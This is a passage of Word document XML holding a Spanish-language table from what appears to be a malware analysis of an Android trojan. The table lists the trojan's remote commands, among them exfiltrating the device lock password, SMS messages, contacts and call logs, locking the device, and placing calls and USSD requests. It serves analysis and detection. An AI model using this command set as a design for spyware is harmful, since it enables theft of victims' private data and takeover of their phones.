      <w:tr w:rsidR="0035666E" w14:paraId="6344C11B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550CF37C" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE5C0E6" w14:textId="42FCCB01" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45262420" w14:textId="05DDEBA0" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Modifica la clave de configuración en las preferencias locales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="1DCC76B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7F42FC" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20397287" w14:textId="7EE4B171" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EB5944" w14:textId="35C1253B" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Obtiene el valor de la clave de configuración de las preferencias locales </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="364901E6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1364B7CB" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19EBA5B0" w14:textId="3FA0913A" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00401A99" w14:textId="26CCFA0E" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Elimina la clave de configuración de las preferencias locales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="70FFBD26" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F6AA73" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F5EB3F" w14:textId="4DEB65B5" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="124EB844" w14:textId="0B369D09" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Activa el componente de la aplicación actual y marca Chameleon como activado en las preferencias locales, además de guardar en la preferencia app_chameleon los datos de la aplicación troyana</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="7B65C294" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7474CE85" w14:textId="4DF76690" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4023CC76" w14:textId="03B945AF" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3867A65B" w14:textId="6D1EDCE2" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra la contraseña de bloqueo del dispositivo, además de modificarla o eliminarla en función de comandos secundarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="688114B6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415A8667" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E30186" w14:textId="13D63667" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>lockkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47BE3EEE" w14:textId="357351D4" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Bloqueo o desbloqueo del </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>dispositivo de acuerdo con comandos adicionales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="4185D3A6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BA9474" w14:textId="783A633B" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>sms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05DE1E41" w14:textId="0F1690E1" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>send</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353B5DAF" w14:textId="196662A1" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Envía un mensaje SMS con los parámetros indicados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="525B8B58" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DF4E98" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED6DBDB" w14:textId="31251289" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43BD5B12" w14:textId="53A88542" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra información sobre mensajes SMS recibidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="1120BA9B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8C56EA" w14:textId="25048049" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EF37B0" w14:textId="619D66D7" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453804E6" w14:textId="1BC2532B" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra datos acerca de los contactos del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="053944C5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6827F404" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FC93CFB" w14:textId="528FDB2D"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63548DE" w14:textId="5BAB3417" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza una llamada al número indicado en el subcomando</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="7216EE73" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1FD7BA" w14:textId="01CB90AD" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A3CC17" w14:textId="02ABA7A1" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BD9802C" w14:textId="7CED04BA" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra el registro de llamadas del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="352AE9DD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AFA2DDA" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABDDAA9" w14:textId="232C8EB0" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Comando call junto con un número de teléfono</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407A76C3" w14:textId="48DCA2B8" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza una llamada al teléfono indicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="7D2925AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CC402D" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C6C59B" w14:textId="4D239AF7" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ussd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32979B2F" w14:textId="59DFA026" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza llamadas a números especiales USSD, también conocidos como códigos de función [X]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="0EB44E4A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BAFEA0" w14:textId="1C7D3CE8" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C73469" w14:textId="53D605CB" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76329CBF" w14:textId="75BD3D94" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Almacena la información de Chameleon en las preferencias locales (aplicación que utiliza Chameleon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="67077630" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A919E7" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C539F45" w14:textId="4E7152EE" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F11C034" w14:textId="1E62317C" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Desactiva los componentes de la aplicación que utiliza Chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="376588D4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C28CD58" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045A6F55" w14:textId="158AA6F3" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>stels</w:t>
            </w:r>
          </w:p>
        </w:tc>
